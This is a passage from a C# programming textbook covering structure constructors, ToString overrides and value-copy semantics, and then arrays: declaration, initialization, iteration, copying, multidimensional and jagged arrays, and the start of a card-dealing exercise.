Date structure should look exactly as follows:
struct Date
{
private int year;
private Month month;
private int day;
}
Consider the default constructor that the compiler will generate for Date.
This constructor sets the year to 0, the month to 0 (the value of January),
and the day to 0. The year value 0 is not valid (because there was no
year 0), and the day value 0 is also not valid (because each month starts
on day 1). One way to fix this problem is to translate the year and day
values by implementing the Date structure so that when the year field
holds the value Y, this value represents the year Y + 1900 (or you can
pick a different century if you prefer), and when the day field holds the
value D, this value represents the day D + 1. The default constructor will
then set the three fields to values that represent the date 1 January 1900.
If you could override the default constructor and write your own, this
would not be an issue because you could then initialize the year and day
fields directly to valid values. You cannot do this, though, so you have
to implement the logic in your structure to translate the compiler-
generated default values into meaningful values for your problem
domain.
However, although you cannot override the default constructor, it is still
good practice to define nondefault constructors to allow a user to
explicitly initialize the fields in a structure to meaningful nondefault
values.
3. Add a public constructor to the Date structure. This constructor should
take three parameters: an int named ccyy for the year, a Month named
mm for the month, and an int named dd for the day. Use these three
parameters to initialize the corresponding fields. A year field with the
value Y represents the year Y + 1900, so you need to initialize the year
field to the value ccyy – 1900. A day field with the value D represents
the day D + 1, so you need to initialize the day field to the value dd – 1.
The Date structure should now look like this (with the constructor
shown in bold):
struct Date
{
private int year;
private Month month;
private int day;
public Date(int ccyy, Month mm, int dd)
{
this.year = ccyy - 1900;
this.month = mm;
this.day = dd - 1;
}
}
4. Add a public method named ToString to the Date structure after the
constructor. This method takes no arguments and returns a string
representation of the date. Remember, the value of the year field
represents year + 1900, and the value of the day field represents day + 1.
Note The ToString method is a little different from the methods
you have seen so far. Every type, including structures and classes
that you define, automatically has a ToString method whether or
not you want it. Its default behavior is to convert the data in a
variable to a string representation of that data. Sometimes the
default behavior is meaningful; other times it is less so. For
example, the default behavior of the ToString method generated for
the Date structure simply generates the string
“StructsAndEnums.Date”. To quote Zaphod Beeblebrox in The
Restaurant at the End of the Universe by Douglas Adams (Pan
Macmillan, 1980), this is “shrewd, but dull.” You need to define a
new version of this method that overrides the default behavior by
using the override keyword. Overriding methods are discussed in
more detail in Chapter 12.
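As a quick illustration (not part of the exercise), this is what the default behavior would produce if you did not override ToString:

Date d = new Date();
Console.WriteLine(d.ToString()); // displays "StructsAndEnums.Date" without an override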
The ToString method should look like this:
struct Date
{
...
public override string ToString()
{
string data = $"{this.month} {this.day + 1} {this.year + 1900}";
return data;
}
}
In this method, you build a formatted string using the text
representations of the values of the month field, the expression this.day
+ 1, and the expression this.year + 1900. The ToString method returns
the formatted string as its result.
5. Display the Program.cs file in the Code and Text Editor window.
6. In the doWork method, comment out the four existing statements.
7. Add statements to the doWork method that declare a local variable
named defaultDate and initialize it to a Date value constructed by using
the default Date constructor. Add another statement to doWork to
display the defaultDate variable on the console by calling
Console.WriteLine.
Note The Console.WriteLine method automatically calls the
ToString method of its argument to format the argument as a
string.
The doWork method should now look like this:
static void doWork()
{
...
Date defaultDate = new Date();
Console.WriteLine(defaultDate);
}
Note When you type new Date(, IntelliSense automatically detects
that two constructors are available for the Date type.
8. On the Debug menu, click Start Without Debugging to build and run the
program. Verify that the date January 1 1900 is written to the console.
9. Press the Enter key to return to the Visual Studio 2017 programming
environment.
10. In the Code and Text Editor window, return to the doWork method and
add two more statements. In the first statement, declare a local variable
named weddingAnniversary and initialize it to July 4 2017. (I actually
did get married on American Independence Day, although it was many
years ago.) In the second statement, write the value of
weddingAnniversary to the console.
The doWork method should now look like this:
static void doWork()
{
...
Date weddingAnniversary = new Date(2017, Month.July, 4);
Console.WriteLine(weddingAnniversary);
}
11. On the Debug menu, click Start Without Debugging, and then confirm
that the date July 4 2017 is written to the console below the previous
information.
12. Press Enter to close the program and return to Visual Studio 2017.
Copying structure variables
You’re allowed to initialize or assign one structure variable to another
structure variable, but only if the structure variable on the right side is
completely initialized (that is, if all its fields are populated with valid data
rather than undefined values). The following example compiles because now
is fully initialized. The illustration shows the results of performing such an
assignment.
Date now = new Date(2012, Month.March, 19);
Date copy = now;
The following example fails to compile because now is not initialized:
Date now;
Date copy = now; // compile-time error: now has not been assigned
When you copy a structure variable, each field on the left side is initialized directly using the corresponding field on the right side. This copying is done as a fast, single operation that copies the contents of the entire structure, and it never throws an exception. Compare this behavior with the equivalent action if Date were a class, in which case both variables (now and copy) would end up referencing the same object on the heap.
Note If you are a C++ programmer, you should note that this copy
behavior cannot be customized.
In the final exercise in this chapter, you will contrast the copy behavior of
a structure with that of a class.
Compare the behavior of a structure and a class
1. In the StructsAndEnums project, display the Date.cs file in the Code and
Text Editor window.
Download from finelybook [email protected]
352
2. Add the following method to the Date structure. This method moves the
date in the structure forward by one month. If, after advancing the
month, the value of the month field has moved beyond December, the
code resets the month to January and advances the value of the year
field by 1.
struct Date
{
...
public void AdvanceMonth()
{
this.month++;
if (this.month == Month.December + 1)
{
this.month = Month.January;
this.year++;
}
}
}
3. Display the Program.cs file in the Code and Text Editor window.
4. In the doWork method, comment out the first two uncommented
statements that create and display the value of the defaultDate variable.
5. Add the following code shown in bold to the end of the doWork method.
This code creates a copy of the weddingAnniversary variable called
weddingAnniversaryCopy and prints out the value of this new variable.
static void doWork()
{
...
Date weddingAnniversaryCopy = weddingAnniversary;
Console.WriteLine($"Value of copy is {weddingAnniversaryCopy}");
}
6. Add the following statements shown in bold to the end of the doWork
method. These statements call the AdvanceMonth method of the
weddingAnniversary variable and then display the value of the
weddingAnniversary and weddingAnniversaryCopy variables:
static void doWork()
{
...
weddingAnniversary.AdvanceMonth();
Console.WriteLine($"New value of weddingAnniversary is {weddingAnniversary}");
Console.WriteLine($"Value of copy is still {weddingAnniversaryCopy}");
}
7. On the Debug menu, click Start Without Debugging to build and run the
application. Verify that the console window displays the following
messages:
July 4 2017
Value of copy is July 4 2017
New value of weddingAnniversary is August 4 2017
Value of copy is still July 4 2017
The first message displays the initial value of the weddingAnniversary
variable (July 4 2017). The second message displays the value of the
weddingAnniversaryCopy variable. You can see that it contains the same
date held in the weddingAnniversary variable (July 4 2017). The third
message displays the value of the weddingAnniversary variable after
changing the month to August (August 4 2017). The final statement
displays the value of the weddingAnniversaryCopy variable. Notice that
it has not changed from its original value of July 4 2017.
If Date were a class, creating a copy would reference the same object in
memory as the original instance. Changing the month in the original
instance would therefore also change the date referenced through the
copy. You will verify this assertion in the following steps.
8. Press Enter and return to Visual Studio 2017.
9. Display the Date.cs file in the Code and Text Editor window.
10. Change the Date structure to a class, as shown in bold in the following
code example:
class Date
{
...
}
11. On the Debug menu, click Start Without Debugging to build and run the
application again. Verify that the console window displays the following
messages:
Click here to view code image
July 4 2017
Value of copy is July 4 2017
New value of weddingAnniversary is August 4 2017
Value of copy is still August 4 2017
The first three messages are the same as before. However, the fourth
message shows that the value of the weddingAnniversaryCopy variable
has changed to August 4 2017.
12. Press Enter and return to Visual Studio 2017.
Structures and compatibility with the Windows Runtime
All C# applications execute by using the common language runtime
(CLR) of the .NET Framework. The CLR is responsible for providing a
safe and secure environment for your application code in the form of a
virtual machine (if you have come from a Java background, this concept
should be familiar to you). When you compile a C# application, the
compiler converts your C# code into a set of instructions using a
pseudo-machine code called the Common Intermediate Language
(CIL). These are the instructions that are stored in an assembly. When
you run a C# application, the CLR takes responsibility for converting
the CIL instructions into real machine instructions that the processor on
your computer can understand and execute. This whole environment is
known as the managed execution environment, and C# programs are
frequently referred to as managed code. You can also write managed
code in other languages supported by the .NET Framework, such as
Visual Basic and F#.
On Windows 7 and earlier versions, you can additionally write
unmanaged applications, also known as native code, based on the
Win32 APIs, which are the APIs that interface directly with the
Windows operating system. (The CLR also converts many of the
functions in the .NET Framework into Win32 API calls if you are
running a managed application, although this process is totally
transparent to your code.) To do this, you can use a language such as
C++. The .NET Framework makes it possible for you to integrate
managed code into unmanaged applications, and vice versa, through a
set of interoperability technologies. Detailing how these technologies
work and how you use them is beyond the scope of this book—suffice
to say that it was not always straightforward.
Later versions of Windows provide an alternative strategy in the
form of the Windows Runtime, or WinRT. WinRT introduces a layer on
top of the Win32 API (and other selected native Windows APIs) that
provides consistent functionality across different types of hardware,
from servers to phones. When you build a Universal Windows Platform
(UWP) app, you use the APIs exposed by WinRT rather than Win32.
Similarly, the CLR on Windows 10 also uses WinRT; all managed code
written by using C# or any other managed language is still executed by
the CLR, but at runtime the CLR converts your code into WinRT API
calls rather than Win32. Between them, the CLR and WinRT are
responsible for managing and running your code safely.
A primary purpose of WinRT is to simplify the interoperability
between languages so that you can more easily integrate components
developed by using different programming languages into a single
seamless application. However, this simplicity comes at a cost, and you
have to be prepared to make a few compromises based on the different
feature sets of the various languages available. In particular, for
historical reasons, although C++ supports structures, it does not
recognize member functions. In C# terms, a member function is an
instance method. So, if you are building C# structures (or structs) that
you want to package up in a library to make available to developers
programming in C++ (or any other unmanaged language), these structs
should not contain any instance methods. The same restriction applies
to static methods in structs. If you want to include instance or static
methods, you should convert your struct into a class. Additionally,
structs cannot contain private fields, and all public fields must be C#
primitive types, conforming value types, or strings.
WinRT also imposes some other restrictions on C# classes and
structs if you want to make them available to native applications.
Chapter 12 provides more information.
Summary
In this chapter, you saw how to create and use enumerations and structures.
You learned some of the similarities and differences between a structure and
a class, and you saw how to define constructors to initialize the fields in a
structure. You also saw how to represent a structure as a string by overriding
the ToString method.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 10, “Using arrays.”
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To: Declare an enumeration
Do this: Write the keyword enum, followed by the name of the type, followed by a pair of braces containing a comma-separated list of the enumeration literal names. For example:

enum Season { Spring, Summer, Fall, Winter }

To: Declare an enumeration variable
Do this: Write the name of the enumeration on the left, followed by the name of the variable, followed by a semicolon. For example:

Season currentSeason;

To: Assign a value to an enumeration variable
Do this: Write the name of the enumeration literal in combination with the name of the enumeration to which it belongs. For example:

currentSeason = Spring; // error
currentSeason = Season.Spring; // correct

To: Declare a structure type
Do this: Write the keyword struct, followed by the name of the structure type, followed by the body of the structure (the constructors, methods, and fields). For example:

struct Time
{
    public Time(int hh, int mm, int ss)
    { ... }
    ...
    private int hours, minutes, seconds;
}

To: Declare a structure variable
Do this: Write the name of the structure type, followed by the name of the variable, followed by a semicolon. For example:

Time now;

To: Initialize a structure variable to a value
Do this: Initialize the variable to a structure value created by calling the structure constructor. For example:

Time lunch = new Time(12, 30, 0);
CHAPTER 10
Using arrays
After completing this chapter, you will be able to:
Declare array variables.
Populate an array with a set of data items.
Access the data items held in an array.
Iterate through the data items in an array.
You have already seen how to create and use variables of many different
types. However, all the examples of variables you have seen so far have one
thing in common—they hold information about a single item (an int, a float, a
Circle, a Date, and so on). What happens if you need to manipulate a set of
items? One solution is to create a variable for each item in the set, but this
leads to some further questions: How many variables do you need? How
should you name them? If you need to perform the same operation on each
item in the set (such as increment each variable in a set of integers), how
would you avoid very repetitive code? Using a separate variable for each item
assumes that you know, when you write the program, how many items you
will need. But how often is this the case? For example, if you are writing an
application that reads and processes records from a database, how many
records are in the database, and how likely is this number to change?
Arrays provide a mechanism that helps to solve these problems.
Declaring and creating an array
An array is an ordered sequence of items. All the items in an array have
the same type, unlike the fields in a structure or class, which can have
different types. The items in an array live in a contiguous block of memory
and are accessed by using an index, unlike fields in a structure or class, which
are accessed by name.
Declaring array variables
You declare an array variable by specifying the name of the element type,
followed by a pair of square brackets, followed by the variable name. The
square brackets signify that the variable is an array. For example, to declare
an array of int variables named pins (for holding a set of personal
identification numbers), you can write the following:
int[] pins; // Personal Identification Numbers
Note If you are a Microsoft Visual Basic programmer, you should
observe that square brackets, not parentheses, are used in the
declaration. If you’re familiar with C and C++, also note that the size of
the array is not part of the declaration. Additionally, the square brackets
must be placed before the variable name.
You are not restricted to using primitive types as array elements. You can
also create arrays of structures, enumerations, and classes. For example, you
can create an array of Date structures like this:
Date[] dates;
Tip It is often useful to give array variables plural names, such as
places (where each element is a Place), people (where each element is a
Person), or times (where each element is a Time).
Creating an array instance
Arrays are reference types, regardless of the type of their elements. This
means that an array variable refers to a contiguous block of memory holding
the array elements on the heap, just as a class variable refers to an object on
the heap. (For a description of values and references and the differences
between the stack and the heap, see Chapter 8, “Understanding values and
references.”) This rule applies regardless of the type of the data items in the
array. Even if the array contains a value type such as int, the memory will
still be allocated on the heap; this is the one case where value types are not
allocated memory on the stack.
Remember that when you declare a class variable, memory is not
allocated for the object until you create the instance by using new. Arrays
follow the same pattern: when you declare an array variable, you do not
declare its size and no memory is allocated (other than to hold the reference
on the stack). The array is given memory only when the instance is created,
and this is also the point at which you specify the size of the array.
To create an array instance, you use the new keyword followed by the
element type, followed by the size of the array you’re creating enclosed
between square brackets. Creating an array also initializes its elements by
using the now familiar default values (0, null, or false, depending on whether
the type is numeric, a reference, or a Boolean, respectively). For example, to
create and initialize a new array of four integers for the pins variable declared
earlier, you write this:
pins = new int[4];
The following illustration shows what happens when you declare an array,
and later when you create an instance of the array:
Because the memory for the array instance is allocated dynamically, the
size of the array does not have to be a constant; it can be calculated at
runtime, as shown in this example:
int size = int.Parse(Console.ReadLine());
int[] pins = new int[size];
You can also create an array whose size is 0. This might sound bizarre,
but it’s useful for situations in which the size of the array is determined
dynamically and could even be 0. An array of size 0 is not a null array; it is
an array containing zero elements.
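The following sketch highlights the distinction:

int[] empty = new int[0]; // a real array instance that contains no elements
Console.WriteLine(empty.Length); // displays 0
int[] missing = null; // no array instance at all
// Console.WriteLine(missing.Length); // would throw a NullReferenceException at runtime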
Populating and using an array
When you create an array instance, all the elements of the array are initialized
to a default value depending on their type. For example, all numeric values
default to 0, objects are initialized to null, DateTime values are set to the date
and time “01/01/0001 00:00:00”, and strings are initialized to null. You can
modify this behavior and initialize the elements of an array to specific values
if you prefer. You do this by providing a comma-separated list of values
between a pair of braces. For example, to initialize pins to an array of four int
variables whose values are 9, 3, 7, and 2, you write this:
int[] pins = new int[4]{ 9, 3, 7, 2 };
The values between the braces do not have to be constants; they can be
values calculated at runtime, as shown in the following example, which
populates the pins array with four random numbers:
Random r = new Random();
int[] pins = new int[4]{ r.Next() % 10, r.Next() % 10, r.Next() % 10,
r.Next() % 10 };
Note The System.Random class is a pseudorandom number generator.
The Next method returns a nonnegative random integer in the range 0 to
Int32.MaxValue by default. The Next method is overloaded, and other
versions enable you to specify the minimum value and maximum value
of the range. The default constructor for the Random class seeds the
random number generator with a time-dependent seed value, which
reduces the possibility of the class duplicating a sequence of random
numbers. Using an overloaded version of the constructor, you can
provide your own seed value. That way, you can generate a repeatable
sequence of random numbers for testing purposes.
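For example, the following sketch (illustrative only) uses both of the overloads just mentioned:

Random seeded = new Random(42); // fixed seed: generates a repeatable sequence for testing
int dieRoll = seeded.Next(1, 7); // a value from 1 to 6; the upper bound is exclusive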
The number of values between the braces must exactly match the size of
the array instance being created:
int[] pins = new int[3]{ 9, 3, 7, 2 }; // compile-time error
int[] pins = new int[4]{ 9, 3, 7 }; // compile-time error
int[] pins = new int[4]{ 9, 3, 7, 2 }; // OK
When you’re initializing an array variable in this way, you can actually
omit the new expression and the size of the array. In this case, the compiler
calculates the size from the number of initializers and generates code to
create the array, such as in the following example:
int[] pins = { 9, 3, 7, 2 };
If you create an array of structures or objects, you can initialize each
structure in the array by calling the structure or class constructor, as shown in
this example:
Time[] schedule = { new Time(12,30), new Time(5,30) };
Creating an implicitly typed array
The element type when you declare an array must match the type of elements
that you attempt to store in the array. For example, if you declare pins to be
an array of int, as shown in the preceding examples, you cannot store a
double, string, struct, or anything that is not an int in this array. If you specify
a list of initializers when declaring an array, you can let the C# compiler infer
the actual type of the elements in the array for you, like this:
var names = new[]{"John", "Diana", "James", "Francesca"};
In this example, the C# compiler determines that the names variable is an
array of strings. It is worth pointing out a couple of syntactic quirks in this
declaration. First, you omit the square brackets from the type; the names
variable in this example is declared simply as var, not var[]. Second, you
must specify the new operator and square brackets before the initializer list.
If you use this syntax, you must ensure that all the initializers have the
same type. This next example causes the compile-time error “No best type
found for implicitly-typed array”:
var bad = new[]{"John", "Diana", 99, 100};
However, in some cases, the compiler will convert elements to a different
type, if doing so makes sense. In the following code, the numbers array is an
array of double because the constants 3.5 and 99.999 are both double, and the
C# compiler can convert the integer values 1 and 2 to double values:
var numbers = new[]{1, 2, 3.5, 99.999};
Generally, it is best to avoid mixing types, hoping that the compiler will
convert them for you.
Implicitly typed arrays are most useful when you are working with
anonymous types, as described in Chapter 7, “Creating and managing classes
and objects.” The following code creates an array of anonymous objects, each
containing two fields specifying the name and age of the members of my
family:
var names = new[] { new { Name = "John", Age = 53 },
new { Name = "Diana", Age = 53 },
new { Name = "James", Age = 26 },
new { Name = "Francesca", Age = 23 } };
The fields in the anonymous types must be the same for each element of
the array.
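For example, the following sketch fails to compile because the second element lacks the Age field:

// compile-time error: no best type found for implicitly-typed array
var bad = new[] { new { Name = "John", Age = 53 },
                  new { Name = "Diana" } };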
Accessing an individual array element
To access an individual array element, you must provide an index indicating
which element you require. Array indexes are zero-based; thus, the initial
element of an array lives at index 0 and not index 1. An index value of 1
accesses the second element. For example, you can read the contents of
element 2 (the third element) of the pins array into an int variable by using
the following code:
int myPin;
myPin = pins[2];
Similarly, you can change the contents of an array by assigning a value to
an indexed element:
myPin = 1645;
pins[2] = myPin;
All array element access is bounds-checked. If you specify an index that is
less than 0 or greater than or equal to the length of the array, the runtime
throws an IndexOutOfRangeException exception, as in this example:
try
{
int[] pins = { 9, 3, 7, 2 };
Console.WriteLine(pins[4]); // error, the 4th and last element is at index 3
}
catch (IndexOutOfRangeException ex)
{
...
}
Iterating through an array
All arrays are actually instances of the System.Array class in the Microsoft
.NET Framework, and this class defines some useful properties and methods.
For example, you can query the Length property to discover how many
elements an array contains and iterate through all the elements of an array by
using a for statement. The following sample code writes the array element
values of the pins array to the console:
int[] pins = { 9, 3, 7, 2 };
for (int index = 0; index < pins.Length; index++)
{
int pin = pins[index];
Console.WriteLine(pin);
}
Note Length is a property and not a method, which is why you don’t use
parentheses when you call it. You will learn about properties in Chapter
15, “Implementing properties to access fields.”
It is common for new programmers to forget that arrays start at element 0
and that the last element is numbered Length – 1. C# provides the foreach
statement, with which you can iterate through the elements of an array
without worrying about these issues. For example, here’s the preceding for
statement rewritten as an equivalent foreach statement:
int[] pins = { 9, 3, 7, 2 };
foreach (int pin in pins)
{
Console.WriteLine(pin);
}
The foreach statement declares an iteration variable (in this example, int
pin) that automatically acquires the value of each element in the array. The
type of this variable must match the type of the elements in the array. The
foreach statement is the preferred way to iterate through an array; it expresses
the intention of the code directly, and all of the for loop scaffolding drops
away. However, in a few cases, you’ll find that you have to revert to a for
statement:
A foreach statement always iterates through the entire array. If you
want to iterate through only a known portion of an array (for example,
the first half) or bypass certain elements (for example, every third
element), it’s easier to use a for statement.
A foreach statement always iterates from index 0 through index Length
– 1. If you want to iterate backward or in some other sequence, it’s
easier to use a for statement.
If the body of the loop needs to know the index of the element rather
than just the value of the element, you have to use a for statement.
If you need to modify the elements of the array, you have to use a for
statement. This is because the iteration variable of the foreach
statement is a read-only copy of each element of the array. (The sketch
following this list illustrates the last two cases.)
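The following sketch (illustrative only) combines the last two cases by iterating backward while modifying each element:

int[] pins = { 9, 3, 7, 2 };
for (int i = pins.Length - 1; i >= 0; i--) // iterate backward: foreach cannot do this
{
    pins[i]++; // modify the element in place: foreach cannot do this either
    Console.WriteLine($"Element {i} is now {pins[i]}");
}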
Tip It’s perfectly safe to attempt to iterate through a zero-length array
by using a foreach statement.
You can declare the iteration variable as a var and let the C# compiler
work out the type of the variable from the type of the elements in the array.
This is especially useful if you don’t actually know the type of the elements
in the array, such as when the array contains anonymous objects. The
following example demonstrates how you can iterate through the array of
family members shown earlier:
var names = new[] { new { Name = "John", Age = 53 },
                    new { Name = "Diana", Age = 53 },
                    new { Name = "James", Age = 26 },
                    new { Name = "Francesca", Age = 23 } };
foreach (var familyMember in names)
{
Console.WriteLine($"Name: {familyMember.Name}, Age:
{familyMember.Age}");
}
Passing arrays as parameters and return values for a method
You can define methods that take arrays as parameters or pass them back as
return values.
The syntax for passing an array as a parameter is much the same as for
declaring an array. For example, the code sample that follows defines a
method named ProcessData that takes an array of integers as a parameter.
The body of the method iterates through the array and performs some
unspecified processing on each element:
public void ProcessData(int[] data)
{
foreach (int i in data)
{
...
}
}
It is important to remember that arrays are reference objects, so if you
modify the contents of an array passed as a parameter inside a method such
as ProcessData, the modification is visible through all references to the array,
including the original argument passed as the parameter.
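To make this behavior concrete, here is a minimal sketch; the Negate method is hypothetical and exists only for illustration:

static void Negate(int[] data)
{
    for (int i = 0; i < data.Length; i++)
    {
        data[i] = -data[i]; // modifies the caller's array, not a copy
    }
}

int[] values = { 1, 2, 3 };
Negate(values);
Console.WriteLine(values[0]); // displays -1: the original array was changed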
To return an array from a method, you specify the type of the array as the
return type. In the method, you create and populate the array. The following
example prompts the user for the size of an array, followed by the data for
each element. The array created by the method is passed back as the return
value:
public int[] ReadData()
{
Console.WriteLine("How many elements?");
string reply = Console.ReadLine();
int numElements = int.Parse(reply);
int[] data = new int[numElements];
for (int i = 0; i < numElements; i++)
{
Console.WriteLine($"Enter data for element {i}");
reply = Console.ReadLine();
int elementData = int.Parse(reply);
data[i] = elementData;
}
return data;
}
You can call the ReadData method like this:
int[] data = ReadData();
Array parameters and the Main method
You might have noticed that the Main method for an application takes
an array of strings as a parameter:
static void Main(string[] args)
{
...
}
Remember that the Main method is called when your program starts
running; it is the entry point of your application. If you start the
application from the command line, you can specify additional
command-line arguments. The Windows operating system passes these
arguments to the common language runtime (CLR), which in turn
passes them as arguments to the Main method. This mechanism gives
you a simple way to allow a user to provide information when an
application starts running instead of prompting the user interactively.
This approach is useful if you want to build utilities that can be run
from automated scripts.
The following example is taken from a utility application called
MyFileUtil that processes files. It expects a set of file names on the
command line and calls the ProcessFile method (not shown) to handle
each file specified:
static void Main(string[] args)
{
foreach (string filename in args)
{
ProcessFile(filename);
}
}
The user can run the MyFileUtil application from the command line
like this:
MyFileUtil C:\Temp\TestData.dat C:\Users\John\Documents\MyDoc.txt
Each command-line argument is separated by a space. It is up to the
MyFileUtil application to verify that these arguments are valid.
Copying arrays
Arrays are reference types (remember that an array is an instance of the
System.Array class). An array variable contains a reference to an array
instance. This means that when you copy an array variable, you actually end
up with two references to the same array instance, as demonstrated in the
following example:
int[] pins = { 9, 3, 7, 2 };
int[] alias = pins; // alias and pins refer to the same array instance
In this example, if you modify the value at pins[1], the change will also be
visible by reading alias[1].
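For example (a short illustrative sketch):

alias[1] = 42;
Console.WriteLine(pins[1]); // displays 42: pins and alias refer to the same array instance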
If you want to make a copy of the array instance (the data on the heap)
that an array variable refers to, you have to do two things. First, you create a
new array instance of the same type and the same length as the array you are
copying. Second, you copy the data from the original array element by
element to the new array, as in this example:
int[] pins = { 9, 3, 7, 2 };
int[] copy = new int[pins.Length];
for (int i = 0; i < pins.Length; i++)
{
copy[i] = pins[i];
}
Note that this code uses the Length property of the original array to
specify the size of the new array.
Copying an array is actually a common requirement of many applications
—so much so that the System.Array class provides some useful methods that
you can employ to copy an array. For example, the CopyTo method copies
the contents of one array into another array given a specified starting index.
The following example copies all the elements from the pins array to the copy
array starting at element zero:
int[] pins = { 9, 3, 7, 2 };
int[] copy = new int[pins.Length];
pins.CopyTo(copy, 0);
Another way to copy the values is to use the System.Array static method
named Copy. As with CopyTo, you must initialize the target array before
calling Copy:
int[] pins = { 9, 3, 7, 2 };
int[] copy = new int[pins.Length];
Array.Copy(pins, copy, copy.Length);
Note Be sure that you specify a valid value for the length parameter of
the Array.Copy method. If you provide a negative value, the method
throws an ArgumentOutOfRangeException exception. If you specify a
value that is greater than the number of elements in the source array, the
method throws an ArgumentException exception.
Yet another alternative is to use the System.Array instance method named
Clone. You can call this method to create an entire array and copy it in one
action:
int[] pins = { 9, 3, 7, 2 };
int[] copy = (int[])pins.Clone();
Note Clone methods are described in Chapter 8. The Clone method of
the Array class returns an object rather than Array, which is why you
must cast it to an array of the appropriate type when you use it.
Furthermore, the Clone, CopyTo, and Copy methods all create a shallow
copy of an array (shallow and deep copying are also described in
Chapter 8). If the elements in the array being copied contain references,
the Clone method simply copies the references rather than the objects
being referred to. After copying, both arrays refer to the same set of
objects. If you need to create a deep copy of such an array, you must
use appropriate code in a for loop.
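Here is a minimal sketch of such a deep copy; the Point class is hypothetical and exists only for illustration:

class Point
{
    public int X, Y;
    public Point(int x, int y) { X = x; Y = y; }
}

Point[] original = { new Point(1, 2), new Point(3, 4) };
Point[] deepCopy = new Point[original.Length];
for (int i = 0; i < original.Length; i++)
{
    // construct a new object for each element instead of copying the reference
    deepCopy[i] = new Point(original[i].X, original[i].Y);
}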
Using multidimensional arrays
The arrays shown so far have contained a single dimension, and you can
think of them as simple lists of values. You can create arrays with more than
one dimension. For example, to create a two-dimensional array, you specify
an array that requires two integer indexes. The following code creates a two-
dimensional array of 24 integers called items. If it helps, you can think of the
array as a table, with the first dimension specifying a number of rows and the
second specifying a number of columns.
int[,] items = new int[4, 6];
To access an element in the array, you provide two index values to specify
the “cell” (the intersection of a row and a column) holding the element. The
following code shows some examples using the items array:
items[2, 3] = 99;          // set the element at cell(2,3) to 99
items[2, 4] = items[2, 3]; // copy the element in cell(2,3) to cell(2,4)
items[2, 4]++;             // increment the integer value at cell(2,4)
There is no limit on the number of dimensions that you can specify for an
array. The next code example creates and uses an array called cube that
contains three dimensions. Notice that you must specify three indexes to
access each element in the array.
int[, ,] cube = new int[5, 5, 5];
cube[1, 2, 1] = 101;
cube[1, 2, 2] = cube[1, 2, 1] * 3;
At this point, it is worth offering a word of caution about creating arrays
with more than three dimensions. Specifically, arrays can consume a lot of
memory. The cube array contains 125 elements (5 * 5 * 5). A four-
dimensional array for which each dimension has a size of 5 contains 625
elements. If you start to create arrays with three or more dimensions, you can
soon run out of memory. Therefore, you should always be prepared to catch
and handle OutOfMemoryException exceptions when you use
multidimensional arrays.
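The following sketch shows the defensive pattern; whether the allocation actually fails depends on the machine, so treat the dimensions as illustrative:

try
{
    int[,,] huge = new int[2000, 2000, 2000]; // 8 billion elements: almost certainly too big
}
catch (OutOfMemoryException)
{
    Console.WriteLine("Not enough memory to allocate the array");
}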
Creating jagged arrays
In C#, ordinary multidimensional arrays are sometimes referred to as
rectangular arrays. Each dimension has a regular shape. For example, in the
following tabular, two-dimensional items array, every row contains 40
columns, and there are 160 elements in total:
int[,] items = new int[4, 40];
As mentioned in the previous section, multidimensional arrays can
consume a lot of memory. If the application uses only some of the data in
each column, allocating memory for unused elements is a waste. In this
scenario, you can use a jagged array, for which each column has a different
length, like this:
int[][] items = new int[4][];
int[] columnForRow0 = new int[3];
int[] columnForRow1 = new int[10];
int[] columnForRow2 = new int[40];
int[] columnForRow3 = new int[25];
items[0] = columnForRow0;
items[1] = columnForRow1;
items[2] = columnForRow2;
items[3] = columnForRow3;
...
In this example, the application requires only 3 elements in the first
column, 10 elements in the second column, 40 elements in the third column,
and 25 elements in the final column. This code illustrates an array of arrays
—items, instead of being a two-dimensional array, has only a single
dimension, but the elements in that dimension are themselves arrays.
Furthermore, the total size of the items array is 78 elements rather than 160;
no space is allocated for elements that the application is not going to use.
It is worth highlighting some of the syntax in this example. The following
declaration specifies that items is an array of arrays of int.
int[][] items;
The following statement initializes items to hold four elements, each of
which is an array of indeterminate length:
items = new int[4][];
The arrays columnForRow0 to columnForRow3 are all single-dimensional
int arrays, initialized to hold the required amount of data for each column.
Finally, each column array is assigned to the appropriate elements in the
items array, like this:
items[0] = columnForRow0;
Recall that arrays are reference objects, so this statement simply adds a
reference to columnForRow0 to the first element in the items array; it does
not actually copy any data. You can populate data in this column either by
assigning a value to an indexed element in columnForRow0 or by referencing
it through the items array. The following statements are equivalent:
columnForRow0[1] = 99;
items[0][1] = 99;
You can extend this idea further if you want to create arrays of arrays of
arrays rather than rectangular three-dimensional arrays, and so on.
Note If you have written code using the Java programming language in
the past, you should be familiar with this concept. Java does not have
multidimensional arrays; instead, you can create arrays of arrays exactly
as just described.
In the following exercise, you will use arrays to implement an application
that deals playing cards as part of a card game. The application displays a
form with four hands of cards dealt at random from a regular (52 cards) pack
of playing cards. You will complete the code that deals the cards for each
hand.
Use arrays to implement a card game
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. Open the Cards solution, which is located in the \Microsoft
Press\VCSBS\Chapter 10\Cards folder in your Documents folder.
3. On the Debug menu, click Start Debugging to build and run the
application.
A form appears with the caption Card Game and four text boxes (labeled
North, South, East, and West). At the bottom is a command bar with an
ellipsis (…). Click the ellipsis to expand the command bar. A button
with the caption Deal should appear:
Note The technique used here is the preferred mechanism for
locating command buttons in Universal Windows Platform (UWP)
apps, and from here on all UWP apps presented in this book will
follow this style.
4. Click Deal.
Nothing happens. You have not yet implemented the code that deals the
cards; this is what you will do in this exercise.
5. Return to Visual Studio 2017. On the Debug menu, click Stop
Debugging.
6. In Solution Explorer, locate the Value.cs file. Open this file in the Code
and Text Editor window.
This file contains an enumeration called Value, which represents the
different values that a card can have, in ascending order:
enum Value { Two, Three, Four, Five, Six, Seven, Eight, Nine,
Ten, Jack, Queen, King, Ace }
7. Open the Suit.cs file in the Code and Text Editor window.
This file contains an enumeration called Suit, which represents the suits
of cards in a regular pack:
enum Suit { Clubs, Diamonds, Hearts, Spades }
8. Display the PlayingCard.cs file in the Code and Text Editor window.
This file contains the PlayingCard class. This class models a single
playing card.
class PlayingCard
{
private readonly Suit suit;
private readonly Value value;
public PlayingCard(Suit s, Value v)
{
this.suit = s;
this.value = v;
}
public override string ToString()
{
string result = $"{this.value} of {this.suit}";
return result;
}
public Suit CardSuit()
{
return this.suit;
}
public Value CardValue()
{
return this.value;
}
}
This class has two readonly fields that represent the value and suit of the
card. The constructor initializes these fields.
Note A readonly field is useful for modeling data that should not
change after it has been initialized. You can assign a value to a
readonly field by using an initializer when you declare it or in a
